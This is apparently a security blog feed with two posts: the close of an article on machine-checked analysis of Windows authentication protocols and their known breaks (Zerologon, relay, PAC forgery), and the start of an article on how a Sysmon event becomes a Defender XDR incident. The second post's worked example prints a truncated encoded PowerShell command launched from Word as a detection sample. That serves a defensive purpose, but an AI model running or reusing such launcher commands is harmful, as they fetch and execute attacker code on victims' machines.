Tamarin	symbolic, Dolev-Yao	may not terminate	DH plus mutable state, unbounded	automated and interactive	stateful key exchange, proofs and attack traces [@tamarin-cav]
ProVerif	symbolic, applied pi and Horn clauses	usually terminates, over-approximates	limited state	automated	fast unbounded analysis, but can report false attacks [@proverif-home]
Scyther	symbolic, pattern refinement	guaranteed on its protocol class	limited	automated	guaranteed termination on a restricted class [@scyther-repo] [@scyther-cav-2008-tool]
CryptoVerif	computational, game-based	semi-automated	not applicable	guided	concrete probability bounds [@cryptoverif-home]
EasyCrypt	computational, proof assistant	manual	not applicable	interactive	primitive-level and game-based proofs [@easycrypt-home]

Why Tamarin for Windows authentication, then? Because these protocols need Diffie-Hellman and post-quantum KEMs, credential state that mutates as tickets are issued, unbounded sessions, and both proofs and concrete attack traces in one tool [@tamarin-cav]. ProVerif is often faster, but its Horn-clause over-approximation makes stateful DH flows awkward and can surface attacks that do not really exist [@proverif-home]. Scyther guarantees termination, but only on a restricted protocol class that this corpus repeatedly steps outside of [@scyther-repo]. The pattern-refinement technique behind Scyther is worth reading in its own right [@scyther-ccs-2008].

Could a symbolic proof simply hand off to a computational guarantee? Sometimes, and that bridge has a name.

A theorem that carries a symbolic proof over to a computational guarantee, provided the cryptographic primitives satisfy specific conditions. The Abadi-Rogaway results established it for formal encryption, but only under strong, primitive-specific side-conditions [@abadi-rogaway-ifip]. There is no universal computational-soundness theorem [@abadi-rogaway-joc].

So the bridge is real but partial, which is why the survey's recommendation is not "pick the best tool" but "combine them": symbolic for protocol logic at scale, computational for primitive strength, and a third layer for the code [@sok-cac]. That third layer is the active frontier. DY* embeds Dolev-Yao symbolic analysis as a library for executable F* code and used it to mechanize Signal end to end, closing the gap between a model and the program that ships [@dystar-ieee] [@dystar-repo]. Verifpal trades some expressiveness for a gentler modeling language with formal semantics, aiming to lower the rate of modeling mistakes [@verifpal-eprint].

Every one of those tools, the symbolic ones especially, shares a single blind spot. It is not a defect in any implementation. It is the definition of the model itself -- and it is where this article has been heading all along.

9. The Boundary the Method Cannot Cross

Return to the question from the first paragraph: was Kerberos broken, or did it just look broken? The honest answer is that a perfect-crypto model can prove a protocol's logic sound and still be completely blind to a flaw that ships a domain takeover. Two results make that boundary precise, and neither is a defect you could engineer away.

The first is about decidability. Durgin, Lincoln, Mitchell, and Scedrov showed that secrecy for protocols with an unbounded number of sessions is undecidable [@dlms-2004]. Restrict to a bounded number of sessions and the problem becomes "merely" NP-complete, as Rusinowitch and Turuani proved [@rusinowitch-turuani]. Put those together and you get a hard fact about tooling: no symbolic verifier can be simultaneously sound, complete, and guaranteed to terminate. Each tool gives up one. Tamarin may not terminate; ProVerif sacrifices completeness and can report false attacks; Scyther restricts the protocol class it accepts [@sok-cac].

The second boundary is sharper, and it is the heart of the whole article. The Dolev-Yao model abstracts cryptography to perfect operations, so it provably cannot represent a flaw that lives in the cryptographic arithmetic itself. Zerologon is the flagship example. The Netlogon credential used AES in CFB8 mode with an all-zero initialization vector, and with probability $\approx 1/256$ per attempt an all-zero plaintext produced an all-zero ciphertext, letting an unauthenticated attacker forge the credential and ultimately seize a domain controller [@cve-2020-1472]. The mechanism is laid out in the disclosure whitepaper [@secura-zerologon]. No symbolic model sees this, because the model has no notion of an IV, a block-cipher mode, or a $1/256$ probability. There is nothing to find.

flowchart TD F[A protocol failure] --> Q{"Is it in the message logic or in the cryptographic arithmetic?"} Q -->|Message logic| S[Symbolic model sees it: relay, reflection, missing binding, signature confusion] Q -->|Cryptographic arithmetic| C[Symbolic model is blind: zero-IV, weak hash, probability gaps] C --> Z[Zerologon lives here, encoded as an equation, never discovered] S --> V[Tamarin can verify or falsify]

This is why the article has been so insistent about one phrase. Where the corpus shows a computational consequence, it encoded the published weakness as an equation in the model; it did not find it.

Note: A symbolic prover that "reproduces" Zerologon has not discovered anything about the cipher. It has had the weakness hand-fed to it as an algebraic identity. Reporting an encoded computational flaw as a symbolic finding is the single most tempting way to overclaim with these tools, and it is wrong every time.

Note: A proof inherits the blind spots of its model. "Verified in Tamarin" means the protocol logic holds against a Dolev-Yao attacker -- it says nothing about the primitives, the probabilities, or the implementation. Always validate the model against the specification, and never read "verified" as "safe."

Key idea: The boundary is the result, not a failure. Unbounded verification is undecidable, and a perfect-crypto model provably cannot represent a probabilistic flaw. So "nothing new across a well-studied corpus" is not an anticlimax. It is the model telling you, precisely, that the protocol logic is sound and that whatever risk remains must live one layer down. That is the most useful thing a symbolic prover can say -- and it can only say it honestly if you respect the wall.

Verified means: within this model, against this adversary, no trace violates this property. Nothing more, and nothing less.

The boundary also tells you which famous attacks were never in scope to begin with.

Kerberoasting [@attack-t1558-003] and AS-REP roasting [@attack-t1558-004] are offline password cracking. Pass-the-Hash is credential theft [@attack-t1550-002]. Golden and Silver tickets are forgeries that start from a compromised key [@attack-t1558-001] [@attack-t1558-002]. DCSync is permission abuse over a replication interface [@attack-t1003-006]. None of these is a protocol-logic flaw, so a perfect-crypto symbolic model cannot see them -- not because the model failed, but because they live, by definition, outside it. A model can encode a stolen key and check whether a containment holds; it cannot "discover" theft as a logic bug.

If the boundary is permanent -- and it is -- then the most interesting questions live right up against it. Where does the method, and this particular corpus, still strain?

10. Where the Method Still Strains

The boundary is not the end of the work; it is where the hardest open problems begin. Five of them bound this corpus.

Computational soundness at full-protocol scale. The dream is to lift a symbolic proof of a deployed protocol automatically to a computational guarantee covering the real primitives -- exactly the gap that hides Zerologon-class flaws. Soundness theorems exist, but only for restricted primitives and conditions [@abadi-rogaway-ifip]. The working answer today is the survey's layered stack -- combine symbolic, computational, and code-level tools -- not a universal bridge [@sok-cac].

Termination with full algebraic theories. Tamarin reasons about Diffie-Hellman and exclusive-or, but with those theories it may not terminate, and terminating results exist only for restricted equational fragments such as Scyther's class. The undecidability wall keeps this an open trade between expressiveness and automation [@dlms-2004].

Composition and whole deployments. Composition theorems are provable for specific seams -- per-channel bindings survive a shared-credential relay, for instance. But scaling to a whole interacting deployment is unsolved, and this corpus hit the wall directly: the heaviest cross-domain four-signature-PAC model exhausted memory on independent re-proof, a concrete state-explosion failure rather than a theoretical one [@cremers-ipsec].

Privacy and equivalence at scale. Secrecy and authentication are reachability properties. Privacy properties -- unlinkability, anonymity -- are equivalence properties, which are markedly harder and scale worse. Tamarin's observational equivalence and ProVerif's equivalence checking handle modest protocols, but the frontier here is genuinely hard [@sok-cac].

From verified models to verified deployments. A proof about a model is only as good as the model's fidelity to the running code. DY* mechanized Signal end to end from executable F* code [@dystar-ieee], and Verifpal lowers the modeling-error rate with friendlier semantics [@verifpal-eprint]. But [MS-*] implementations are closed, so for this corpus model fidelity has to be argued from the public specification rather than mechanically derived from the binaries.

Those are the frontier's problems, and none of them has to be solved before the five patterns become useful. Here is what you can do with them this afternoon.

11. Auditing With the Five Patterns

The taxonomy earns its keep as a checklist. You do not need Tamarin to use it -- you need a specification, a design review, and five questions. Each maps to a concrete Windows mechanism and a documented fix.

Note: 1. Channel binding. Is every authenticator bound to the endpoint it is used on? The fix is a TLS channel binding such as tls-server-end-point, Extended Protection for Authentication, and the SPNEGO mechListMIC against downgrade [@rfc5929] [@rfc4178]. 2. Keyed integrity. Is every integrity check keyed, never a bare checksum? The fix is the keyed PAC signature MS14-068 should have required [@cve-2014-6324]. 3. Direction tags. Does every symmetric credential carry a direction or role tag? In a model the remedy is a direction/role offset; MS08-068 itself shipped it as reflection/replay detection -- the SMB endpoint records the challenge it issued and rejects an authenticator that comes back carrying it [@ms08-068]. 4. Identity binding. Does every signed token bind requester, key, and audience? For PKINIT that is the paChecksum request-binding of RFC 4556 Section 3.2.1, whose hash RFC 8636 made agile [@rfc4556] [@rfc8636]. 5. Delegation. Does every delegation chain keep its restriction under composition? The fix is the krbtgt ticket signature Bronze Bit bypassed [@cve-2020-17049].

A "no" to any question does not prove a break -- it tells you where to look first, and which published fix already exists. That is the difference between a taxonomy and a vulnerability scanner: the taxonomy makes you faster at the questions, not lazier about the answers.

If you go further and model a protocol yourself, the corpus's method carries two warnings worth repeating.

Note: Keep each flawed/fixed pair minimal: toggle exactly one mechanism, so a falsification points at one cause. Always add a control that re-enables the mechanism and flips the verdict back, or you cannot tell a real break from a modeling artifact. Validate the model against the specification it claims to represent. And never report an encoded probabilistic flaw as a symbolic finding [@sok-cac].

The most common channel-binding gaps in a real domain are LDAP, RDP, and SMB. Microsoft's guidance is to move `LdapEnforceChannelBinding` toward enforcement once clients are ready [@kb4034879], following the staged requirements in the LDAP hardening advisory [@adv190023] and its companion timeline [@kb4520412]; to keep CredSSP patched so the `pubKeyAuth` binding is enforced [@cve-2018-0886]; and to require SMB signing so a relayed session cannot be tampered mid-stream [@ms-smb-signing]. None of these is exotic -- they are Pattern 1, three times.

Run those five questions and you are doing by hand what the corpus did by machine. Which leaves only the questions people ask out loud when they hear the phrase "I verified Windows authentication and found nothing."

12. Questions People Ask

No, and that is the point. Every break in this article was already published, with its own CVE, RFC, or paper. The contribution is not a bug; it is the unified, machine-checked taxonomy that shows these breaks are five recurring shapes rather than two dozen unrelated accidents. Finding zero new vulnerabilities across a corpus this well-studied is the evidence the taxonomy is real, not a disappointment. No -- "verified" and "secure" are different claims. A Dolev-Yao proof certifies that the protocol *logic* holds against the modeled adversary, and nothing more: the strength of the primitives, the probabilities, and the shipped implementation all sit outside the model. Section 9 draws that line precisely and explains why a clean proof narrows where the remaining risk can live without eliminating it. No. Zerologon is a computational flaw -- AES in CFB8 mode with a zero initialization vector -- that a perfect-crypto symbolic model cannot represent [@cve-2020-1472]. In my Tamarin model, Netlogon also exhibits a structural reflection a symbolic prover can express -- a modeling observation, not a separately published Netlogon weakness -- but the real escalation turns on that arithmetic weakness, which a symbolic model can only be told about, not derive. Section 6 introduces the distinction where the pattern appears, and Section 9 places it exactly on the symbolic/computational boundary. No. The computational layer -- primitives, key sizes, probabilities -- and the implementation layer are both outside symbolic scope. A clean symbolic proof narrows where the risk can live; it does not eliminate it. The right move is to combine symbolic, computational, and code-level tools [@sok-cac]. Because a single one-adversary model turns scattered analogies into a checked taxonomy, and because the same models prove *positive* guarantees that the per-CVE view could never produce -- forward secrecy, key-compromise-impersonation resistance, delegation containment under composition [@cremers-ipsec]. The known breaks are the calibration; the guarantees and the structure are the payoff. Both, for different questions. Symbolic analysis scales to protocol logic across a whole corpus; computational analysis bounds the strength of the primitives; code-level analysis binds a model to the program that runs. The survey's recommendation is a layered stack, not a single winner [@sok-cac]. Section 8 has the full tool-by-tool comparison; the short answer is that ProVerif's speed advantage does not buy much here. The features that define this corpus -- Diffie-Hellman and post-quantum KEM key exchange, credentials whose state changes with every issued ticket, and unbounded sessions that need a concrete counterexample when a proof fails -- are exactly the combination that falls outside ProVerif's comfortable analysis fragment and lands inside Tamarin's [@tamarin-cav] [@proverif-home].

So: was Windows authentication broken, or did it just look broken? The answer the corpus gives is precise. Twenty-three protocols, one adversary, twelve of them pushed harder -- and every break it could exhibit was one already on the record, each reducible to one of five structural shapes: a missing channel binding, an unkeyed integrity check, an untagged symmetric credential, an unbound token, or a restriction that dissolves under composition. The same models that exhibit those breaks also prove the fixes hold, even when you hand the attacker more power than the original analyses dared.

The shapes themselves are old news. Channel binding, keyed integrity, direction tags, audience binding, and delegation protection were each understood when they were each invented. What was missing was a way to say, in one breath and with a machine to back it, that they are the same five mistakes recurring across protocols that share no code -- and to draw the line, exactly, where a symbolic prover stops seeing and Zerologon's arithmetic begins.

That line is the gift. It tells you that "nothing new" is not the tool shrugging; it is the tool reporting, honestly, that the logic is sound and the remaining risk lives one layer down. Carry the five questions with you. The next authentication protocol has not been written yet -- but when it is, you already know the five ways it is most likely to break.

One Event, Three Portals: How a Single Sysmon Line Becomes a Microsoft Defender XDR Incident

noreply@paragmali.com (Parag Mali) — Thu, 04 Jun 2026 00:00:00 GMT

A single Sysmon ProcessCreate event takes six observable hops to land in a Microsoft Defender XDR incident: kernel ETW emission, agent shipping through a Data Collection Rule, ingestion into a Log Analytics workspace, KQL detection in Microsoft Sentinel, optional alert correlation from Microsoft Defender for Cloud's CWPP plans, and finally entity-graph fan-in inside the unified Defender portal [@ms-learn-sysmon] [@ms-learn-ama-overview] [@ms-learn-mdc-xdr-concept] [@ms-learn-xdr-correlation]. Each hop adds latency, loses fidelity, or introduces a configuration cliff -- and one wrong word in a Data Collection Rule (`Microsoft-Event` instead of `Microsoft-WindowsEvent`) silently drops the entire pipeline [@ms-learn-ama-windows-events]. This article walks the full path with a concrete worked example, names where the convergence actually stops, and gives a six-step recipe to build the pipeline yourself.

1. One event, three portals, nine minutes

At 14:03:17 UTC on a Tuesday, winword.exe on the host MAL-CONTOSO-PRD-04 spawns a child process: powershell.exe -EncodedCommand JABwAD0AJwBoAHQAdABwADoALwAv.... Sysmon, which loads early in the boot sequence as a boot-start kernel driver, writes a single ProcessCreate record (Event ID 1) to the Windows event log channel Microsoft-Windows-Sysmon/Operational [@ms-learn-sysmon]. The record is roughly two kilobytes of XML with a stable ProcessGuid field that uniquely identifies the new process across the host's lifetime [@ms-learn-defrag-tools-sysmon].

At 14:03:21 UTC, the same record appears in the Event table of an Azure Log Analytics workspace named law-contoso-secops [@ms-learn-event-table]. At 14:05:00 UTC, a Microsoft Sentinel scheduled analytics rule fires its five-minute KQL query, matches a parent-image heuristic (winword.exe -> powershell.exe -EncodedCommand), and produces a SecurityAlert row whose Entities JSON column names the host, the parent process, the child process, and the encoded command line [@ms-learn-sentinel-scheduled-rules] [@ms-learn-sentinel-entities]. At 14:07:42 UTC, a Microsoft Defender for Cloud (MDC) alert -- emitted by the MDC for Servers cloud workload protection plan, which sits on top of the Microsoft Defender for Endpoint (MDE) sensor on that same host -- shows up in the workspace's SecurityAlert table with the title Suspicious PowerShell command line [@ms-learn-mdc-defender-servers] [@ms-learn-mdc-mde-integration]. And at 14:09:30 UTC -- nine minutes and thirteen seconds after the kernel call -- a single incident appears in the Microsoft Defender XDR portal at security.microsoft.com. Its title: Multi-stage incident on one endpoint. Its alert tab lists three rows: one from Sentinel, one from MDC, and (because MDE was also installed) one from Defender for Endpoint's native detection engine [@ms-learn-defender-xdr-incidents] [@ms-learn-xdr-correlation].

Three independent detection systems, three different timestamps, three different alert grammars, one incident. How?

That question is the spine of this article. It is not a marketing question -- "look how unified it is" -- because the convergence is partial and the seams are load-bearing. It is an engineering question: which hops happen where, what does each hop cost in latency and money, and where does the unification actually stop?

Key idea: Microsoft Defender XDR is not a single product. It is a correlation surface that fans in three structurally different pipelines: Sentinel's KQL analytics rules over Log Analytics, Defender for Cloud's cloud-workload-protection (CWPP) alerts from MDC plans (servers, containers, SQL, storage, App Service), and the native Defender stack (Endpoint, Identity, Office, Cloud Apps). The fan-in is real but partial: Sentinel cross-workspace correlation, MDC posture findings, and most third-party connectors stay outside the unified incident graph [@ms-learn-defender-xdr-overview] [@ms-learn-mdc-xdr-concept].

Here is the full path the Sysmon record takes from kernel to portal. Each numbered box is a real component with its own owner team, deployment lifecycle, and failure mode:

flowchart LR A["1 Sysmon kernel ETW provider on host"] B["2 Azure Monitor Agent + Data Collection Rule"] C["3 Log Analytics workspace Event/SecurityEvent tables"] D["4 Sentinel scheduled or NRT analytics rule -- KQL"] E["5 MDC alert via Defender for Servers + MDE sensor"] F["6 Defender XDR correlation engine -- security.microsoft.com"] A --> B --> C --> D --> F C --> E --> F classDef src fill:#e8f4ff,stroke:#2b6cb0,color:#1a365d classDef sink fill:#fffaf0,stroke:#dd6b20,color:#7b341e class A,B,C src class F sink

The diagram understates how separate these hops are. Box 2 lives on the host. Box 3 is a multi-tenant Azure Data Explorer cluster [@ms-learn-adx-docs]. Box 4 runs on Sentinel's serverless query engine inside the workspace's home region. Box 5 is a Defender for Cloud plan with its own SKU, scoped to an Azure subscription. Box 6 is a separate web portal in a separate Microsoft 365 tenant scope. Each one rolled out at a different time, was renamed at least once, and absorbed a different earlier product. The next section recovers the lineage that explains why.

2. Three lineages that became one portal

The three pipelines that converge at hop 6 did not start as siblings. They started as three separate Microsoft product lines aimed at three different buyer personas: an Azure subscription owner who wanted posture scoring, a Windows engineer who wanted endpoint detection, and a SOC analyst who wanted a SIEM. Reading the path right-to-left -- from the unified portal back to its three roots -- is the only honest way to understand why the seams look the way they do.

A platform that ingests security-relevant logs from many sources, normalizes them into a queryable schema, runs correlation rules to produce alerts, and groups related alerts into incidents that a SOC analyst triages. Microsoft Sentinel is a SIEM [@ms-learn-sentinel-overview]. A platform (often packaged with a SIEM) that runs playbooks in response to alerts -- isolating a host, disabling an account, opening a ticket. In Microsoft's stack, SOAR is implemented as Azure Logic Apps invoked from Sentinel automation rules [@ms-learn-sentinel-soar]. A sensor that runs on a single endpoint, collects rich process / file / network / registry telemetry, applies behavioural detections locally and in the cloud, and exposes response actions (terminate process, isolate machine, collect investigation package). Microsoft Defender for Endpoint is an EDR [@ms-learn-mde-landing] [@ms-learn-mde-eda]. A correlation layer that fans in alerts and entities from multiple Microsoft-or-vendor detection products (endpoint, identity, email, cloud apps, cloud workloads) and merges related alerts into a single incident graph. Microsoft Defender XDR is Microsoft's XDR; the term was popularized by Palo Alto Networks in 2018 [@ms-learn-defender-xdr-overview] [@pan-blog-xdr-journey].

The CSPM line started first. In December 2015, Microsoft put Azure Security Center (ASC) into public preview as a per-subscription posture dashboard that scored Azure resources against a baseline of hardening recommendations [@azure-blog-asc-preview-2015]. ASC went generally available in July 2016 alongside JIT VM access [@ms-security-blog-asc-ga-2016]. Public sources frequently report ASC GA as "October 2015" or "October 2016." The primary Azure blog from December 2015 explicitly says "Azure Security Center -- now in public preview," and the July 2016 Microsoft Security blog announces the GA wave of new capabilities. The December 2015 preview / mid-2016 GA framing matches both authoritative announcements [@azure-blog-asc-preview-2015] [@ms-security-blog-asc-ga-2016]. Over the next five years ASC absorbed runtime protection plans -- Defender for Servers, SQL, Storage, App Service, Containers -- and was renamed Microsoft Defender for Cloud at Ignite Fall 2021, the same wave that renamed Microsoft Cloud App Security to Microsoft Defender for Cloud Apps (MDCA) [@ms-learn-mdc-introduction] [@ms-learn-mdca-rename-2021].

The SIEM line is much younger. Microsoft announced Azure Sentinel in public preview on February 28, 2019 as the first cloud-native SIEM from a hyperscaler, built on top of Azure Log Analytics and the Kusto Query Language [@ms-blog-sentinel-preview-2019]. It went GA on September 24, 2019 [@ms-security-blog-sentinel-ga-2019]. It was renamed Microsoft Sentinel in November 2021 (same Ignite wave). Sentinel inherited every Log Analytics integration that Azure Monitor already had, which meant it could ingest Windows event logs, syslog, Office 365 audit, Microsoft Entra ID sign-ins, and anything you could shove into a workspace with a custom collector [@ms-learn-sentinel-data-connectors-ref].

The XDR line landed last. In September 2020 Microsoft announced "Microsoft unified SIEM and XDR" as a direction, and rolled the Office 365 ATP and Microsoft Defender ATP detection surfaces into a single portal called Microsoft 365 Defender [@ms-security-blog-unified-siem-xdr-2020]. The portal was renamed Microsoft Defender XDR in early 2024, and the SIEM and XDR portals were merged at Ignite November 2023, with the unified Microsoft security operations platform going generally available in July 2024 [@ms-blog-ignite-2023] [@ms-security-blog-unified-secops-2024]. The Sentinel experience inside the Azure portal will be retired on March 31, 2027 (a deadline extended from its original July 1, 2026 target); after that date, Sentinel lives only inside security.microsoft.com [@ms-learn-sentinel-azure-portal-retiring] [@helpnetsec-sentinel-defender-timeline].

gantt title Three lineages converging at security.microsoft.com dateFormat YYYY-MM axisFormat %Y

section EDR line
Sysmon v1 (Sysinternals)         :done, 2014-08, 12M
Microsoft Defender ATP (EDR)     :done, 2016-03, 60M
Renamed Microsoft Defender for Endpoint :done, 2020-09, 24M

section CSPM and CWPP line
Azure Security Center preview    :done, 2015-12, 8M
Azure Security Center GA         :done, 2016-07, 64M
Renamed Microsoft Defender for Cloud :done, 2021-11, 36M

section SIEM line
Azure Sentinel preview           :done, 2019-02, 7M
Azure Sentinel GA                :done, 2019-09, 26M
Renamed Microsoft Sentinel       :done, 2021-11, 24M

section XDR convergence
Microsoft 365 Defender portal    :done, 2020-09, 38M
Sentinel merged into Defender portal :done, 2023-11, 8M
Unified secops GA                :done, 2024-07, 24M
Sentinel Azure portal retires    :crit, 2027-03, 1M

Three things matter about this timeline for the rest of the article. First, the CSPM/CWPP line is older than either SIEM or XDR -- which is why the Defender for Cloud team owns its own alert format, its own subscription-scoped permissions model, and its own portal at portal.azure.com/#blade/Microsoft_Azure_Security, none of which fully merge into the unified Defender experience even today. Second, Sentinel inherited Log Analytics, not the other way around -- so the storage substrate, the agent (Azure Monitor Agent), and the query language (KQL) all predate Sentinel by years and serve far more workloads than security. Third, the unified portal is the new arrival, not the foundation. The convergence is grafted on top of three pre-existing pipelines, and that grafting -- not the products themselves -- is what makes the architecture interesting.

3. The pre-cloud SIEM bottleneck

To understand why Sentinel was built the way it was, hold the question in mind that every SIEM buyer asked their finance team between roughly 2008 and 2018: "Why does each new server cost me a license-tier upgrade?"

Classic on-premises SIEMs -- Splunk Enterprise, ArcSight, QRadar -- priced by ingested gigabytes per day, billed as a perpetual or annual license tied to a tier. Crossing a tier boundary triggered a forklift purchase. Storage was on-prem disk, and retention was constrained by how much steel you bought; compute was on the same hardware, so peak query load contended with peak ingest. The cost shape was step-wise, and the constraint that bound it most painfully was peak ingest rate.

Cost dimension	Classic on-prem SIEM	Cloud-native SIEM (Sentinel)
Ingest billing unit	License tier (GB/day, stepped)	Per-GB ingest (continuous) [@ms-learn-sentinel-billing]
Storage billing unit	Bundled with license tier	Per-GB-month retention (continuous) [@ms-learn-sentinel-billing]
Compute billing unit	Bundled / hardware capex	Per-query bytes scanned (serverless) [@ms-learn-adx-docs]
Capacity planning	Estimate peak GB/day a year out	None -- pay for what you ingested last hour
New data source onboarding	Re-tier and order disks	Add a Data Collection Rule [@ms-learn-dcr-overview]

The reframe Sentinel proposed -- and that the Kusto/Log Analytics substrate enabled -- was to separate the three cost axes: ingest, storage retention, and query compute. Each axis bills continuously and independently. There is no tier to cross. Adding a new data source is a Data Collection Rule edit, not a procurement event. Retaining last quarter's logs another year is a per-GB-month flag, not a disk purchase [@ms-learn-sentinel-billing].

Note: Aha #1 -- the economic reframe. What looked like a pricing change ("SaaS billing") was actually an architectural change. Classic SIEMs bundled ingest, storage, and compute because the hardware bundled them. Once each axis lives on a different cloud service (Event Hubs / DCR for ingest, ADX for storage, KQL serverless query for compute), there is no bundle to defend. The SaaS bill is downstream of the deconstructed architecture, not the cause of it.

This deconstruction is what makes the Sentinel pipeline interesting upstream of the SOC. When ingest is a separately-billed continuous variable, the Data Collection Rule becomes the most important security artifact in the deployment: it determines what flows in and therefore both what costs you incur and what you can possibly detect. (The accuracy-report follow-up that drives section 10 hinges on exactly one wrong word in a DCR.) When query compute is serverless and per-byte, a long-running threat hunt over a year of process-creation events is a question of dollars, not of capacity-plan slack. And when storage retention is a per-GB-month flag, the question "should we retain this for compliance?" decouples from "do we have rack space?"

Sentinel offers a flexible and predictable pricing model. Pay-as-you-go pricing lets you pay for what you use, while commitment tiers provide guaranteed discounts. [@ms-learn-sentinel-billing]

That is the pricing-page sales line. The architectural truth underneath it is that the three pre-cloud bundles unbundled, and once they unbundled, the SIEM was free to grow horizontally with the rest of the cloud workload. That is exactly what happened with Sentinel between 2019 and 2024: it accumulated 300+ data connectors for every Azure service, every Microsoft 365 surface, every major SaaS log feed, and a long tail of third-party security tools [@ms-learn-sentinel-data-connectors-ref]. None of that catalog would have been economically sane on a per-GB/day license tier.

But the unbundle was not free. The price of separately-billed continuous axes is that you have to measure on all three axes. You now need to know your steady-state ingest rate, your retention policy, and your hunt query patterns. The next section steps inside the substrate that makes those measurements -- and the queries on top of them -- possible.

4. The cloud-native SIEM substrate: KQL on Log Analytics

Microsoft Sentinel is a thin layer over a much older substrate. That substrate is Azure Monitor Log Analytics, which itself is a security-and-multitenancy wrapper around Azure Data Explorer (ADX), the cluster engine that runs Kusto Query Language (KQL) [@ms-learn-adx-docs]. Understanding the stack matters because almost everything Sentinel can or cannot do is determined by what Log Analytics and KQL can or cannot do, not by anything Sentinel itself implements.

A multi-tenant namespace inside Azure Monitor that stores ingested telemetry in typed tables and exposes them for KQL query. Each workspace lives in a specific Azure region and Azure subscription, has its own access controls, and bills ingest and retention independently. Sentinel "is enabled" on a workspace; the workspace is the storage and query unit [@ms-learn-sentinel-overview]. A read-only, pipe-composed query language for time-series and tabular log data, originally developed for Azure Data Explorer. KQL is the lingua franca of Azure Monitor Logs, Microsoft Sentinel analytics, Microsoft Defender XDR advanced hunting, and several other Microsoft data services [@ms-learn-adx-docs] [@ms-learn-advanced-hunting].

The layering is shown below. Notice that KQL itself spans four Microsoft surfaces, of which Sentinel is just one. KQL's polymorphism -- one query language across Monitor, Sentinel, Defender XDR advanced hunting, and ADX itself -- is the single most under-appreciated decision in the Microsoft security stack. It is also the reason your KQL skills move across teams.

flowchart TB subgraph L1["Layer 1 -- storage cluster"] ADX["Azure Data Explorer (Kusto engine)"] end subgraph L2["Layer 2 -- managed namespace"] LA["Log Analytics workspace -- typed tables, RBAC, regional"] end subgraph L3["Layer 3 -- query surfaces"] AZM["Azure Monitor logs -- ops + perf"] SEN["Microsoft Sentinel -- SIEM analytics rules"] XDR["Defender XDR -- advanced hunting"] ADXQ["ADX direct -- analytics + BI"] end ADX --> LA LA --> AZM LA --> SEN LA --> XDR ADX --> ADXQ classDef stor fill:#e8f4ff,stroke:#2b6cb0,color:#1a365d classDef ns fill:#fff5d6,stroke:#b7791f,color:#5f370e classDef ui fill:#e6fffa,stroke:#319795,color:#234e52 class ADX stor class LA ns class AZM,SEN,XDR,ADXQ ui

The substrate predates Sentinel by years. Log Analytics was the rebranded form of Operations Management Suite (OMS), which Microsoft introduced in 2015 as a cloud companion to System Center Operations Manager. The agent that fed OMS -- the Microsoft Monitoring Agent (MMA), sometimes also called the Log Analytics agent -- shared its agent lineage with the System Center Operations Manager agent and ran on Windows and Linux servers to ship event logs and performance counters to the workspace [@ms-learn-laa-deprecated] [@lunavi-oms-azure-monitor]. ADX (Kusto) was productised externally in 2018 after years of internal Microsoft use as the engine behind Bing telemetry, Office 365 ops, and Azure monitoring [@ms-learn-adx-docs].

The naming continuity is worth pausing on. *Log Analytics* (2016) replaced *OMS* (2015), which replaced *Application Insights workspaces* (2014), which absorbed parts of *Operations Manager* (2007). The data store underneath was *Kusto* the whole time. By the time Azure Sentinel launched in 2019 [@ms-blog-sentinel-preview-2019], the substrate had been hardened for four years at hyperscale, mostly for non-security workloads. Sentinel did not have to invent the storage; it inherited it. This is also why the same KQL skill maps onto application telemetry and infrastructure metrics, not just security.

Two consequences of the substrate inheritance shape every hop downstream:

Schema is per-table, not per-product. A Log Analytics workspace exposes typed tables like Event (Windows event log records), SecurityEvent (Windows Security channel), Syslog, Heartbeat, SecurityAlert, DeviceProcessEvents (mirrored from Defender XDR's advanced hunting schema), Perf, and any number of Custom_CL tables [@ms-learn-event-table] [@ms-learn-securityevent-table]. KQL queries are written against tables, not against products. A Sentinel analytics rule is just a saved KQL query that runs on a schedule and emits a row into SecurityAlert.
Cross-workspace and cross-table joins are first-class. Because the substrate is a real query engine, you can join between SecurityEvent and SigninLogs and DeviceProcessEvents in a single rule. You can use workspace("law-other").Event to reach into a separate workspace. You can call externaldata() to read from a blob. This expressive power is the source of both Sentinel's flexibility and its operational complexity: the rule that worked in test stops working in prod because the test workspace did not have a SigninLogs table or because the cross-workspace permission is missing [@ms-learn-sentinel-threat-detection].

For the Sysmon worked example: the kernel record will land in the Event table (because Sysmon's channel is treated as a generic Windows event log, not as the SecurityEvent Security channel). The detection KQL will live as a Sentinel scheduled analytics rule that reads from Event, filters to Source == "Microsoft-Windows-Sysmon" and EventID == 1, parses the XML payload (the next section will show the exact pattern), and emits a SecurityAlert row. That SecurityAlert row is what hop 6 ultimately fans in. The substrate did all the heavy lifting; Sentinel just wrote the rule.

5. The XDR reframe: from per-product portals to a single incident graph

If the SIEM substrate is "many tables, one query engine," the XDR reframe is "many alert sources, one incident graph." Microsoft Defender XDR exists because by 2019 a typical Microsoft enterprise customer had four or five separate Microsoft security portals -- one for Office 365 ATP, one for Microsoft Defender ATP, one for Microsoft Cloud App Security, one for Azure AD Identity Protection, and the Azure Security Center / Sentinel pair. Each portal had its own alert grammar, its own console, and its own analyst workflow. The XDR reframe is to keep the alert sources but merge the analyst surface.

A correlation surface at `security.microsoft.com` that fans in alerts and entity data from the Microsoft Defender product family (Endpoint, Identity, Office 365, Cloud Apps), Microsoft Sentinel, and Microsoft Defender for Cloud's runtime CWPP plans, then merges related alerts into incidents using shared entity identifiers (user, device, file hash, IP, URL) [@ms-learn-defender-xdr-overview] [@ms-learn-defender-xdr-incidents].

The mechanism the merge uses is the entity graph. When any of the source pipelines emits an alert, it is required to attach a set of typed entities (e.g., Host = MAL-CONTOSO-PRD-04, Process = winword.exe, Account = CONTOSO\\jdoe) to that alert [@ms-learn-sentinel-entities]. The Defender XDR correlation engine reads incoming alerts, normalizes the entity values, and groups alerts whose entities overlap in time and identity into a single incident [@ms-learn-xdr-correlation]. That is the entire trick. It is conceptually simple. Operationally it has many edge cases, which section 8 returns to.

For the worked example, the three alert sources (Sentinel KQL rule, MDC for Servers, MDE) each emit a separate alert. Each alert lists Host = MAL-CONTOSO-PRD-04 and (for two of the three) ProcessGuid = {abc-...}. The correlation engine merges them on the host entity within a sliding time window. Result: one incident with three correlated alerts, not three separate incidents. The temporal fan-out is shown below; the fan-in geometry returns in section 6.6.

